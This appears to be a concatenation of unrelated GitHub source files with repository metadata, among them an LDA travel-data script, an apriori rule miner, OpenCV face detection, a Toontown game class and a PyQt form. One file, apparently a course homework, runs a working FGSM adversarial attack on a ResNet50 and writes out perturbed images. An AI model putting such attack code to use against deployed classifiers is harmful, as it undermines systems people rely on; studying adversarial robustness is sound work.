267f051b5e058cd2c27f5c5f7de155cd7f7c48c0
|
142c458d4e9fee7f5dd810d75763903d6789ad34
|
/classfy_id_new.py
|
1fde20b270abe1550c51dee27fb75d9d257cef70
|
[] |
no_license
|
Pengfight/testfile
|
c5bfb5fbc2cc77072f48521a85b1e7b6cec9c456
|
c067995495f5a119f7cea4ddd49bb14dd40e9a3d
|
refs/heads/master
| 2021-04-26T22:14:13.598400
| 2018-03-24T02:32:08
| 2018-03-24T02:32:08
| 124,047,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,789
|
py
|
import json
import os
class lda_learning():
def classfy_city_data(self):
'''
Divide the data set according to the number of days of trip,
divided into 4 days, 4-5 days, 6-7 days, 8-10 days,
10 days and above,five kinds of situations.
the format of each line:id trip-id word word word...
The length of word is 4 hours, rounding up.
'''
time_sum=0.0
rid1=0
rid2=0
rid3=0
rid4=0
rid5=0
citys_arry=[]
with open('../data/path_json_with_time1.json',encoding='utf-8') as fd:
loaded = json.load(fd)
outfile1=open('../data/cityHours_doc_train_dis_4.txt','w',encoding='utf-8')
outfile2=open('../data/cityHours_doc_train_dis_4-5.txt','w',encoding='utf-8')
outfile3=open('../data/cityHours_doc_train_dis_6-7.txt','w',encoding='utf-8')
outfile4=open('../data/cityHours_doc_train_dis_8-10.txt','w',encoding='utf-8')
outfile5=open('../data/cityHours_doc_train_dis_10.txt','w',encoding='utf-8')
for path in loaded:
citys_arry=[]
citylist=''
for place in path:
time_sum=0.0
if place.get(u'type') == 'place':
place_name = place.get(u'name')
trip_id=place.get(u'plan_id')
if place_name not in citys_arry:
citys_arry.append(place_name)
trave_time=place.get(u'travel_times')
for i in range(len(trave_time)):
time_sum+=float(trave_time[i])
if int(time_sum) == 0:
time_sum=4
citylist+=(str(place_name)+' ')*int((time_sum/4))
if len(citys_arry)<4:
rid1+=1
outfile1.write(str(rid1)+' '+str(trip_id)+' ')
outfile1.write(citylist)
outfile1.write('\n')
elif len(citys_arry)<=5:
rid2+=1
outfile2.write(str(rid2)+' '+str(trip_id)+' ')
outfile2.write(citylist)
outfile2.write('\n')
elif len(citys_arry)<=7:
rid3+=1
outfile3.write(str(rid3)+' '+str(trip_id)+' ')
outfile3.write(citylist)
outfile3.write('\n')
elif len(citys_arry)<=10:
rid4+=1
outfile4.write(str(rid4)+' '+str(trip_id)+' ')
outfile4.write(citylist)
outfile4.write('\n')
else:
rid5+=1
outfile5.write(str(rid5)+' '+str(trip_id)+' ')
outfile5.write(citylist)
outfile5.write('\n')
fd.close()
outfile1.close()
outfile2.close()
outfile3.close()
outfile4.close()
outfile5.close()
def data_format(self):
'''
format training data sets
'''
#copy data file
os.system("cp ../data/cityHours_doc_train_dis_4.txt ../../../tools/warplda/data")
os.system("cp ../data/cityHours_doc_train_dis_4-5.txt ../../../tools/warplda/data")
os.system("cp ../data/cityHours_doc_train_dis_6-7.txt ../../../tools/warplda/data")
os.system("cp ../data/cityHours_doc_train_dis_8-10.txt ../../../tools/warplda/data")
os.system("cp ../data/cityHours_doc_train_dis_10.txt ../../../tools/warplda/data")
#format data sets
os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_4.txt -prefix train4")
os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_4-5.txt -prefix train4_5")
os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_6-7.txt -prefix train6_7")
os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_8-10.txt -prefix train8_10")
os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_10.txt -prefix train10")
def training(self,days,k,niter):
'''
train data sets and get topic model
:param days: the kind of data set
(e.g. 4:4 days, 4_5:4-5 days, 6_7:6-7 days, 8_10:8-10 days, 10:10 days)
:param k: the number of topics
:param niter: the number of iterations
'''
os.system("cd ../data;../../../tools/warplda/release/src/warplda --prefix train"+days+" --k "+k+" --niter "+niter)
#os.system("mv ../tools/warplda/release/src/train"+days+".info.full.txt train6_7.info11.full.txt")
|
[
"noreply@github.com"
] |
noreply@github.com
|
5d64b3ec43f8f8706fbb5bc2f4c1dea3573739ee
|
d6d87140d929262b5228659f89a69571c8669ec1
|
/airbyte-connector-builder-server/connector_builder/generated/models/stream_slicer.py
|
56c37db2c82d4d65076de8f3b5e19e85d772378d
|
[
"MIT",
"Elastic-2.0"
] |
permissive
|
gasparakos/airbyte
|
b2bb2246ec6a10e1f86293da9d86c61fc4a4ac65
|
17c77fc819ef3732fb1b20fa4c1932be258f0ee9
|
refs/heads/master
| 2023-02-22T20:42:45.400851
| 2023-02-09T07:43:24
| 2023-02-09T07:43:24
| 303,604,219
| 0
| 0
|
MIT
| 2020-10-13T06:18:04
| 2020-10-13T06:06:17
| null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
# coding: utf-8
from __future__ import annotations
from datetime import date, datetime # noqa: F401
import re # noqa: F401
from typing import Any, Dict, List, Optional # noqa: F401
from pydantic import AnyUrl, BaseModel, EmailStr, Field, validator # noqa: F401
class StreamSlicer(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
StreamSlicer - a model defined in OpenAPI
"""
StreamSlicer.update_forward_refs()
|
[
"noreply@github.com"
] |
noreply@github.com
|
04a004618f6c38d9bfac1befca74c661217cb50f
|
d300d3953fb55eb271c8afcf5cf03b2635ca4e4c
|
/D A/python/关联apriori.py
|
6e25145eb90fe4fa307a0e7441fb41434e8005b2
|
[] |
no_license
|
JamesBrowns/data-analysis
|
fc1bc61d797f0d7e985280b62e617c86322a3ea3
|
119adb5570ab68560744dd516577b07f947ca1aa
|
refs/heads/master
| 2020-03-18T04:29:51.185087
| 2018-03-08T07:18:12
| 2018-03-08T07:18:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,735
|
py
|
#coding=utf-8
import pandas as pd
from sklearn.cluster import KMeans
'''
#聚类离散化
datafile='chapter8/demo/data/data.xls'
outputfile='chapter8/out/processed_data.xls'
typelabel ={u'肝气郁结证型系数':'A', u'热毒蕴结证型系数':'B', u'冲任失调证型系数':'C', u'气血两虚证型系数':'D', u'脾胃虚弱证型系数':'E', u'肝肾阴虚证型系数':'F'}
k=4
#读取数据并进行聚类分析
data=pd.read_excel(datafile)
keys=list(typelabel.keys())
result=pd.DataFrame()
if __name__ == '__main__':
for i in range(len(keys)):
#调用聚类
print u'正在进行%s的的聚类'%keys[i]
kmodel=KMeans(n_clusters=k,n_jobs=1)
#print keys[i]
#print [keys[i]]
#print data[[keys[i]]][:5]
kmodel.fit(data[[keys[i]]].as_matrix())
r1=pd.Series(kmodel.labels_).value_counts()
r2=pd.DataFrame(kmodel.cluster_centers_,
columns=[typelabel[keys[i]]])
r1=pd.DataFrame(r1,columns=[typelabel[keys[i]]+'n'])
#r=pd.concat([r2,r1],axis=1)
r=pd.concat([r2,r1],axis=1).sort_values(by=[typelabel[keys[i]]])
r.index=[1,2,3,4]
print r
r[typelabel[keys[i]]]=pd.rolling_mean(r[typelabel[keys[i]]],2)
print r
#用来计算相邻两列的均值,以此作为边界点
r[typelabel[keys[i]]][1]=0.0
print r
#这两句代码将原来的聚类中心改为边界点
result=result.append(r.T)
print result
result=result.sort_index()
result.to_excel(outputfile)
'''
#利用关联规则
#导入编写的apriori
#自定义连接函数,用于实现L_{k-1}到C_k的连接
def connect_string(x, ms):
x = list(map(lambda i:sorted(i.split(ms)), x))
l = len(x[0])
r = []
for i in range(len(x)):
for j in range(i,len(x)):
if x[i][:l-1] == x[j][:l-1] and x[i][l-1] != x[j][l-1]:
r.append(x[i][:l-1]+sorted([x[j][l-1],x[i][l-1]]))
return r
#寻找关联规则的函数
def find_rule(d, support, confidence, ms = u'--'):
result = pd.DataFrame(index=['support', 'confidence']) #定义输出结果
support_series = 1.0*d.sum()/len(d) #支持度序列
column = list(support_series[support_series > support].index) #初步根据支持度筛选
k = 0
while len(column) > 1:
k = k+1
print(u'\n正在进行第%s次搜索...' %k)
column = connect_string(column, ms)
print(u'数目:%s...' %len(column))
sf = lambda i: d[i].prod(axis=1, numeric_only = True) #新一批支持度的计算函数
#创建连接数据,这一步耗时、耗内存最严重。当数据集较大时,可以考虑并行运算优化。
d_2 = pd.DataFrame(list(map(sf,column)), index = [ms.join(i) for i in column]).T
support_series_2 = 1.0*d_2[[ms.join(i) for i in column]].sum()/len(d) #计算连接后的支持度
column = list(support_series_2[support_series_2 > support].index) #新一轮支持度筛选
support_series = support_series.append(support_series_2)
column2 = []
for i in column: #遍历可能的推理,如{A,B,C}究竟是A+B-->C还是B+C-->A还是C+A-->B?
i = i.split(ms)
for j in range(len(i)):
column2.append(i[:j]+i[j+1:]+i[j:j+1])
cofidence_series = pd.Series(index=[ms.join(i) for i in column2]) #定义置信度序列
for i in column2: #计算置信度序列
cofidence_series[ms.join(i)] = support_series[ms.join(sorted(i))]/support_series[ms.join(i[:len(i)-1])]
for i in cofidence_series[cofidence_series > confidence].index: #置信度筛选
result[i] = 0.0
result[i]['confidence'] = cofidence_series[i]
result[i]['support'] = support_series[ms.join(sorted(i.split(ms)))]
result = result.T.sort_values(['confidence','support'], ascending = False) #结果整理,输出
print u'\n结果为:'
print result
return result
#调用规则
import time
inputfile='chapter8/demo/data/apriori.txt'
data=pd.read_csv(inputfile,header=None,dtype=object)
start=time.clock()#即时开始
print u'\n转换矩阵开始0-1....'
ct=lambda x:pd.Series(1,index=x[pd.notnull(x)])
#转换0-1矩阵的过渡矩阵
b=map(ct,data.as_matrix())
data=pd.DataFrame(b).fillna(0)#填充0
end=time.clock()
print u'转换矩阵完毕,用时:%0.2f秒' %(end-start)
del b #删除中间变量
support=0.06
confidence=0.75
ms='---'
start=time.clock()
print u'开始搜索关联规则...'
find_rule(data,support,confidence,ms)
end=time.clock()
print u'搜索完成,用时%0.2f秒'%(end-start)
|
[
"noreply@github.com"
] |
noreply@github.com
|
58eef740f0a71ad36123660a1cea5be91fcd8b15
|
fdee1ecf7cdf11c15771bd325897775060fed64c
|
/app/errors/__init__.py
|
f139f1d53be91d9cbf4e98a335b4ca7ab36b4c6d
|
[] |
no_license
|
SIRLA-FJULIS/LIS-Lib-Shift-Arrangement-System
|
67feda105c16e085b28bbd64fec048c92e5c2dec
|
707644ab48df857630a404c4d017b19d786d6694
|
refs/heads/master
| 2020-05-22T04:49:07.575629
| 2020-04-10T09:40:05
| 2020-04-10T09:40:05
| 186,222,486
| 1
| 0
| null | 2021-01-23T09:01:20
| 2019-05-12T06:59:36
|
Python
|
UTF-8
|
Python
| false
| false
| 100
|
py
|
from flask import Blueprint
errors = Blueprint('errors', __name__)
from app.errors import handlers
|
[
"opp40519@gmail.com"
] |
opp40519@gmail.com
|
31c62fc913b614a426a1d11bfdb7c02603bd6e2b
|
6096f62297b072c566a6572ac460eb75c4e439f3
|
/人工神经网络实现/opencv预处理.py
|
fe350e967ffe833fedcbaa55a2d309d7a41056a6
|
[] |
no_license
|
kenan666/learngit
|
7397810dc76b5fa5ec9d24ae060a7f8528f687f7
|
e8da383991c21ae0e1ec28510d04f0cc76f1c729
|
refs/heads/master
| 2020-04-07T08:07:23.430761
| 2019-01-06T09:04:40
| 2019-01-06T09:04:40
| 158,199,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,061
|
py
|
# 步骤 -》 load xml 文件 -》 load 图片 -》灰度处理 -》 检测 -> 遍历并标注
import cv2
import numpy as np
# load xml file
face_xml = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_xml = cv2.CascadeClassifier('haarcascade_eye.xml')
# load jpg file
img = cv2.imread('face.jpg')
cv2.imshow('src',img)
# 计算 haar 特征
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# 检测
faces = face_xml.detectMultiScale(gray,1.3,5)
print ('face =',len (faces))
# draw
index = 0
for (x,y,w,h) in faces:
cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2) # rectangle 绘制方框 标记
roi_face = gray[y:y+h,x:x+w]
roi_color = img [y:y+h,x:x+w]
fileName = str(index) + '.jpg'
cv2.imwrite(fileName,roi_color)
index = index + 1
# 必须是灰度图像
eyes = eye_xml.detectMultiScale(roi_face)
print ('eye = ',len(eyes))
#for (e_x,e_y,e_w,e_h) in eyes:
#cv2.rectangle(roi_color,(e_x,e_y),(e_x+e_w,e_y+e_h),(0,255,0),2)
cv2.imshow('dst',img)
cv2.waitKey(0)
|
[
"1746740633@qq.com"
] |
1746740633@qq.com
|
5b9637487e45d95d05cd2fac74ca279bc4cf8938
|
d0befba20015501fbd57888abf78eeb24389ac40
|
/prac1b.py
|
5530fe3d9cd1635b5ae73798c763acd3f7587816
|
[] |
no_license
|
satyamthaker/Data-Structure
|
0de59a24cbcdf9472a3546c52dc2c534b1c947df
|
fdbbc2c7b601037e71e482dcf08bf02ae69641ef
|
refs/heads/master
| 2023-01-03T05:26:33.761829
| 2020-10-29T05:01:55
| 2020-10-29T05:01:55
| 295,732,823
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
m1 = [[1,2,3],
[4 ,5,6],
[7 ,8,9]]
m2 = [[10,11,12,13],
[14,15,16,17],
[18,19,20,21]]
res = [[0,0,0,0],
[0,0,0,0],
[0,0,0,0]]
for i in range(len(m1)):
for j in range(len(m2[0])):
for k in range(len(m2)):
res[i][j] += m1[i][k] * m2[k][j]
for n in res:
print(n)
|
[
"noreply@github.com"
] |
noreply@github.com
|
7b1f422a0751188ab3254f50f1c2e5c5b56b4a51
|
41e69a2c4802e038841948f49854f6e72c472179
|
/bin/pip
|
7f00391542197da72f764c63753ec02da696125b
|
[] |
no_license
|
edisonik/artesanato_brasileiro.github.io
|
6d4246ef9cafac0e749d6c1e44afd0a1e28cca77
|
2ad99cadf5ab6c6afe5544fcc267975b230add96
|
refs/heads/master
| 2020-05-07T13:57:46.227961
| 2019-07-15T02:19:22
| 2019-07-15T02:19:22
| 180,570,562
| 1
| 0
| null | 2019-07-15T23:55:29
| 2019-04-10T11:50:12
|
Python
|
UTF-8
|
Python
| false
| false
| 241
|
#!/var/www/artesanato_brasileiro/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"root@ip-172-31-6-208.sa-east-1.compute.internal"
] |
root@ip-172-31-6-208.sa-east-1.compute.internal
|
|
94f78ff7515cedf224519e07f552630acac3127a
|
a857d1911a118b8aa62ffeaa8f154c8325cdc939
|
/toontown/estate/DistributedFireworksCannon.py
|
d5691917f5a2a6d4d53e4cdd97782a58257a8ec5
|
[
"MIT"
] |
permissive
|
DioExtreme/TT-CL-Edition
|
761d3463c829ec51f6bd2818a28b667c670c44b6
|
6b85ca8352a57e11f89337e1c381754d45af02ea
|
refs/heads/main
| 2023-06-01T16:37:49.924935
| 2021-06-24T02:25:22
| 2021-06-24T02:25:22
| 379,310,849
| 0
| 0
|
MIT
| 2021-06-22T15:07:31
| 2021-06-22T15:07:30
| null |
UTF-8
|
Python
| false
| false
| 4,308
|
py
|
from toontown.toonbase.ToontownGlobals import *
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from HouseGlobals import *
from toontown.effects import DistributedFireworkShow
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
from panda3d.core import CollisionSphere, CollisionNode
import FireworksGui
class DistributedFireworksCannon(DistributedFireworkShow.DistributedFireworkShow):
notify = directNotify.newCategory('DistributedFireworksCannon')
def __init__(self, cr):
DistributedFireworkShow.DistributedFireworkShow.__init__(self, cr)
self.fireworksGui = None
self.load()
return
def generateInit(self):
DistributedFireworkShow.DistributedFireworkShow.generateInit(self)
self.fireworksSphereEvent = self.uniqueName('fireworksSphere')
self.fireworksSphereEnterEvent = 'enter' + self.fireworksSphereEvent
self.fireworksGuiDoneEvent = 'fireworksGuiDone'
self.shootEvent = 'fireworkShootEvent'
self.collSphere = CollisionSphere(0, 0, 0, 2.5)
self.collSphere.setTangible(1)
self.collNode = CollisionNode(self.fireworksSphereEvent)
self.collNode.setIntoCollideMask(ToontownGlobals.WallBitmask)
self.collNode.addSolid(self.collSphere)
self.collNodePath = self.geom.attachNewNode(self.collNode)
def generate(self):
DistributedFireworkShow.DistributedFireworkShow.generate(self)
def announceGenerate(self):
self.notify.debug('announceGenerate')
self.accept(self.fireworksSphereEnterEvent, self.__handleEnterSphere)
def disable(self):
self.notify.debug('disable')
self.ignore(self.fireworksSphereEnterEvent)
self.ignore(self.shootEvent)
self.ignore(self.fireworksGuiDoneEvent)
if self.fireworksGui:
self.fireworksGui.destroy()
self.fireworksGui = None
DistributedFireworkShow.DistributedFireworkShow.disable(self)
return
def delete(self):
self.notify.debug('delete')
self.geom.removeNode()
DistributedFireworkShow.DistributedFireworkShow.delete(self)
def load(self):
self.geom = loader.loadModel('phase_5/models/props/trashcan_TT.bam')
self.geom.reparentTo(base.cr.playGame.hood.loader.geom)
self.geom.setScale(0.5)
def __handleEnterSphere(self, collEntry):
self.notify.debug('handleEnterSphere()')
self.ignore(self.fireworksSphereEnterEvent)
self.sendUpdate('avatarEnter', [])
def __handleFireworksDone(self):
self.ignore(self.fireworksGuiDoneEvent)
self.ignore(self.shootEvent)
self.sendUpdate('avatarExit')
self.fireworksGui.destroy()
self.fireworksGui = None
return
def freeAvatar(self):
base.localAvatar.posCamera(0, 0)
base.cr.playGame.getPlace().setState('walk')
self.accept(self.fireworksSphereEnterEvent, self.__handleEnterSphere)
def setMovie(self, mode, avId, timestamp):
timeStamp = globalClockDelta.localElapsedTime(timestamp)
isLocalToon = avId == base.localAvatar.doId
if mode == FIREWORKS_MOVIE_CLEAR:
self.notify.debug('setMovie: clear')
return
elif mode == FIREWORKS_MOVIE_GUI:
self.notify.debug('setMovie: gui')
if isLocalToon:
self.fireworksGui = FireworksGui.FireworksGui(self.fireworksGuiDoneEvent, self.shootEvent)
self.accept(self.fireworksGuiDoneEvent, self.__handleFireworksDone)
self.accept(self.shootEvent, self.localShootFirework)
return
else:
self.notify.warning('unknown mode in setMovie: %s' % mode)
def setPosition(self, x, y, z):
self.pos = [x, y, z]
self.geom.setPos(x, y, z)
def localShootFirework(self, index):
style = index
col1, col2 = self.fireworksGui.getCurColor()
amp = 30
dummy = base.localAvatar.attachNewNode('dummy')
dummy.setPos(0, 100, 60)
pos = dummy.getPos(render)
dummy.removeNode()
print 'lauFirework: %s, col=%s' % (index, col1)
self.d_requestFirework(pos[0], pos[1], pos[2], style, col1, col2)
|
[
"devinhall4@gmail.com"
] |
devinhall4@gmail.com
|
b9948cf1676e6d0a8275b85e3147d5465083dffc
|
b89ce172f2a793924f3a159ab15541342d4c989e
|
/hw5/best.py
|
063dc3d08f6206a32384219d2855c68308d06e1f
|
[] |
no_license
|
KiyoM99/ML2019SPRING
|
42e63cc06136f4db673ad3940ae35d83ce5046e6
|
a9157759f00bb3f36be785513c969027cfe2dca7
|
refs/heads/master
| 2020-04-24T07:18:44.353378
| 2019-06-07T14:53:33
| 2019-06-07T14:53:33
| 171,795,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,603
|
py
|
# coding: utf-8
# In[1]:
from PIL import Image
import numpy as np
import pickle as pk
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import torch.nn as nn
import torch.utils.data
import random as ran
import time
import torchvision.transforms as transforms
import sys
# In[2]:
def load_image( infilename ) :
img = Image.open( infilename )
img.load()
data = np.asarray( img, dtype="int32" )
return data
def save_image( npdata, outfilename ) :
img = Image.fromarray( np.asarray( np.clip(npdata,0,255), dtype="uint8"), "L" )
img.save( outfilename )
# In[3]:
a=np.zeros((1,224,224,3))
for i in range(200):
b=load_image(sys.argv[1]+'/'+str(1000+i)[1:]+'.png')
b=np.reshape(b,(1,224,224,3))
a=np.concatenate((a,b))
print(np.shape(a))
a=a/255
a1=a[1:]
# In[4]:
a3=np.zeros((200,3,224,224))
for i in range(200):
for l in range(3):
for n in range(224):
for p in range(224):
a3[i][l][n][p]=a1[i][n][p][l]
# In[5]:
a2=np.copy(a3)
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
for i in range(200):
a2[i][0]=(a2[i][0]-mean[0])/std[0]
a2[i][1]=(a2[i][1]-mean[1])/std[1]
a2[i][2]=(a2[i][2]-mean[2])/std[2]
# In[6]:
aaaaa='305 883 243 559 438 990 949 853 609 582 915 455 619 961 630 741 455 707 854 922 129 537 672 476 299 99 476 251 520 923 760 582 525 317 464 478 667 961 865 324 33 922 142 312 302 582 948 360 789 440 746 764 949 480 792 900 733 327 441 882 920 839 955 555 519 510 888 990 430 396 97 78 140 362 705 659 640 967 489 937 991 887 603 467 498 879 807 708 967 472 287 853 971 805 719 854 471 890 572 883 476 581 603 967 311 873 582 16 672 780 489 685 366 746 599 912 950 614 348 353 21 84 437 946 746 646 544 469 597 81 734 719 51 293 897 416 544 415 814 295 829 759 971 306 637 471 94 984 708 863 391 383 417 442 38 858 716 99 546 137 980 517 322 765 632 595 754 805 873 475 455 442 734 879 685 521 640 663 720 759 535 582 607 859 532 113 695 565 554 311 8 385 570 480 324 897 738 814 253 751'
aaaaa=aaaaa.split(' ')
aaaaa=np.asarray(aaaaa)
# In[7]:
aaaaa=aaaaa.astype(np.int)
# In[8]:
import torchvision.models as models
VGG19 = models.resnet50(True)
# In[9]:
x=a2
y=aaaaa
# In[10]:
VGG19.eval()
VGG19=VGG19.cuda()
# In[11]:
x1=torch.from_numpy(x)
y1=torch.from_numpy(y)
x1=x1.type("torch.FloatTensor")
y1=y1.long()
train_dataset = torch.utils.data.TensorDataset(x1,y1)
# In[12]:
test_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=8,
shuffle=False)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=1,
shuffle=False)
# In[13]:
def fgsm_attack(image, epsilon, data_grad):
sign_data_grad = data_grad.sign()
perturbed_image = image + epsilon*sign_data_grad
return perturbed_image
# In[14]:
def test( model, test_loader, epsilon ):
nnn=[]
correct = 0
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
data.requires_grad = True
output = model(data)
init_pred = output.max(1, keepdim=True)[1]
#if init_pred.item() != target.item():
#continue
loss = F.nll_loss(output, target)
model.zero_grad()
loss.backward()
data_grad = data.grad.data
perturbed_data = fgsm_attack(data, epsilon, data_grad)
ppp=perturbed_data.cpu().detach().numpy()
nnn.append(ppp)
output = model(perturbed_data)
final_pred = output.max(1, keepdim=True)[1]
if final_pred.item() == target.item():
correct += 1
final_acc = correct/float(len(test_loader))
print("Epsilon: {}\tTest Accuracy = {} / {} = {}".format(epsilon, correct, len(test_loader), final_acc))
return final_acc, nnn
# In[15]:
torch.manual_seed(1654822)
for i in range(2):
a,nnn=test(VGG19,train_loader,0.02)
nnn1=np.asarray(nnn)
nnn1=np.reshape(nnn1,(200, 3, 224, 224))
nnn2=torch.from_numpy(nnn1)
nnn2=nnn2.type("torch.FloatTensor")
nnn_dataset = torch.utils.data.TensorDataset(nnn2,y1)
train_loader = torch.utils.data.DataLoader(dataset=nnn_dataset,
batch_size=1,
shuffle=False)
# In[16]:
x=nnn1
# In[17]:
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
for i in range(200):
x[i][0]=x[i][0]*std[0]+mean[0]
x[i][1]=x[i][1]*std[1]+mean[1]
x[i][2]=x[i][2]*std[2]+mean[2]
# In[18]:
a=np.zeros((200,224,224,3))
tt=time.time()
for i in range(200):
if i%40==0:
print(i,time.time()-tt)
tt=time.time()
for l in range(224):
for n in range(224):
for p in range(3):
a[i][l][n][p]=x[i][p][l][n]
if a[i][l][n][p]>1:
a[i][l][n][p]=1
elif a[i][l][n][p]<0:
a[i][l][n][p]=0
# In[19]:
a=a*255
a=np.rint(a)
a=a.astype(np.uint8)
# In[20]:
x=a
# In[21]:
x=x.astype(np.uint8)
# In[22]:
for i in range(200):
img = Image.fromarray(x[i])
img.save(sys.argv[2]+'/'+str(1000+i)[1:]+'.png')
|
[
"noreply@github.com"
] |
noreply@github.com
|
ffcfbf0bf4d986773c415aa90c4c6801a6d49e20
|
ef50f38a4bba1f34ae1bc8f74b962088e2cce6e7
|
/form.py
|
71bd8903253793e0f6020dd12b8158731d712203
|
[] |
no_license
|
PeterSanctus/Slave_Success-V2
|
b71f340cc76d41f542f45836ea70881c920e3090
|
2d9212612199562f5c243c157a1efaaa917be6e4
|
refs/heads/master
| 2020-03-06T22:45:48.483387
| 2018-03-28T08:04:50
| 2018-03-28T08:04:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,152
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'form.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(687, 364)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(687, 364))
MainWindow.setMaximumSize(QtCore.QSize(687, 364))
MainWindow.setStyleSheet("Qwidget::setFixedSize(587,334);")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.prjButton = QtWidgets.QPushButton(self.centralwidget)
self.prjButton.setGeometry(QtCore.QRect(10, 20, 51, 20))
self.prjButton.setObjectName("prjButton")
self.prjLineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.prjLineEdit.setGeometry(QtCore.QRect(80, 20, 201, 20))
self.prjLineEdit.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.prjLineEdit.setReadOnly(True)
self.prjLineEdit.setObjectName("prjLineEdit")
self.taskLineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.taskLineEdit.setEnabled(True)
self.taskLineEdit.setGeometry(QtCore.QRect(80, 70, 201, 20))
self.taskLineEdit.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.taskLineEdit.setReadOnly(True)
self.taskLineEdit.setObjectName("taskLineEdit")
self.taskButton = QtWidgets.QPushButton(self.centralwidget)
self.taskButton.setEnabled(False)
self.taskButton.setGeometry(QtCore.QRect(10, 70, 51, 20))
self.taskButton.setObjectName("taskButton")
self.slaveCkBox = QtWidgets.QCheckBox(self.centralwidget)
self.slaveCkBox.setGeometry(QtCore.QRect(50, 170, 181, 17))
self.slaveCkBox.setObjectName("slaveCkBox")
self.microCkBox = QtWidgets.QCheckBox(self.centralwidget)
self.microCkBox.setGeometry(QtCore.QRect(50, 230, 181, 17))
self.microCkBox.setObjectName("microCkBox")
self.logCkBox = QtWidgets.QCheckBox(self.centralwidget)
self.logCkBox.setGeometry(QtCore.QRect(50, 260, 181, 17))
self.logCkBox.setStyleSheet("")
self.logCkBox.setObjectName("logCkBox")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setGeometry(QtCore.QRect(30, 140, 191, 191))
self.groupBox.setStyleSheet("QGroupBox {\n"
" border: 1px solid gray;\n"
" border-radius: 9px;\n"
" margin-top: 0.5em;\n"
"}\n"
"QGroupBox::title {\n"
" subcontrol-origin: margin;\n"
" left: 10px;\n"
" padding: 0 3px 0 3px;\n"
"}")
self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.groupBox.setCheckable(False)
self.groupBox.setObjectName("groupBox")
self.runSlaveCkBox = QtWidgets.QCheckBox(self.groupBox)
self.runSlaveCkBox.setEnabled(False)
self.runSlaveCkBox.setGeometry(QtCore.QRect(20, 60, 141, 16))
self.runSlaveCkBox.setObjectName("runSlaveCkBox")
self.exportsButton = QtWidgets.QPushButton(self.groupBox)
self.exportsButton.setEnabled(False)
self.exportsButton.setGeometry(QtCore.QRect(40, 155, 75, 23))
self.exportsButton.setObjectName("exportsButton")
self.logWindow = QtWidgets.QTextBrowser(self.centralwidget)
self.logWindow.setGeometry(QtCore.QRect(300, 20, 371, 311))
font = QtGui.QFont()
font.setPointSize(9)
self.logWindow.setFont(font)
self.logWindow.setStyleSheet("color: rgb(93, 93, 93);\n"
"margin: 0; \n"
"padding: 0;\n"
"size: 8 px;")
self.logWindow.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.logWindow.setTabStopWidth(80)
self.logWindow.setObjectName("logWindow")
self.groupBox.raise_()
self.prjButton.raise_()
self.prjLineEdit.raise_()
self.taskLineEdit.raise_()
self.taskButton.raise_()
self.logCkBox.raise_()
self.microCkBox.raise_()
self.slaveCkBox.raise_()
self.logWindow.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 687, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
